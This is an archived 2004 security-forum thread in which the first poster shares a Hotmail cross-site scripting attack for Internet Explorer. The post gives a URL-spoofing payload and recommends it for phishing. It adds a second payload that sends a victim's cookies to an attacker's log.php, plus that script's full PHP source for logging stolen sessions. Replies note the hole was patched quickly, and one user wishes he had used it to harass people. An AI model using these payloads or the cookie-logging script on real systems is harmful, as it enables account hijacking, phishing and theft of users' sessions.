hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Vort3x
Aug 8 2004, 03:18 PM
I've just been looking at this hotmail XSS attack, for people who couldn't
get it to work you need to set the mime type to HTML.

I've looked at this issue with IE, and i've noticed another problem, if i
send the line below to a hotmail address the url gets spoofed.

<!--[if IE gte 5]><img
src="javascript:window.location='http://www.google.com'"><![endif]-->

That will auto redirect you to www.google.com but look at the address bar,
for me it says:

http://by5fd.bay5.hotmail.msn.com/cgi-bin/...000001&a=foobar

Ok so whats good about a spoofed URL?
Well it's from hotmail, this will make for an EXTREAMLY convincing phishing
attack, since it's not hard to view the source of www.hotmail.com use the
find command and search for form, and well everyone can figure out what to
do from there.

Also it's possible to steal the users cookies using the following line:
<!--[if IE gte 5]><img
src="javascript:window.location='http://www.yoursite.com/log.php?email=victimsaddress@hotmail.com&cookie='

+ document.cookie"><![endif]-->

Remember to type by hand the victims email address otherwise you won't know
who's it is.

Content of log.php

<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"]){

$logcookie = $HTTP_GET_VARS["cookie"];
$logcookie = rawurldecode($logcookie); //turns url encoding to normal
text
$logemail = $HTTP_GET_VARS["email"];
$logemail = rawurldecode($logemail); //turns url encoding to normal text

$handle=fopen($file, "r+"); //Opening the file in read only
$filecontence=fread($handle,filesize("$file"));
fclose($handle);

$handle=fopen($file, "w"); //Opening the file for writing
fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
//Writing email address and cookie then the rest of the log
fclose($handle);
}
header("Location: http://www.hotmail.com");
?>

End of log.php

And of course you can add other stuff to log.php like an IP stealing
function.

Also i think the possibilities are endless with this, since i think it's
possible to use iframes and other javascript to split the document.location
and get to the compose new message window and then load in addresses from
the address book, but <script language="JavaScript"> Tags like this still
appear to be filtered but i think a number of img tags with javascript in
them will continue to be run, not sure yet.
aapje
Aug 9 2004, 02:20 AM
old... posted some time ago
migo
Aug 9 2004, 11:15 AM
yeah
hotmail already patched this long time ago now
mrBob
Aug 9 2004, 11:34 AM
yep, only worked for like 3 days
chris105
Aug 11 2004, 11:22 PM
In case something like this comes about again, how do I set a mime type to html ?
aapje
Aug 12 2004, 08:27 AM
header("Content-Type: text/html; charset=iso-8859-1");

i believe
chris105
Aug 12 2004, 11:13 AM
Cheers, didnt use this one which was a shame, there are some really annoying people out there just crying to have horse porn downloaded to their computers.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.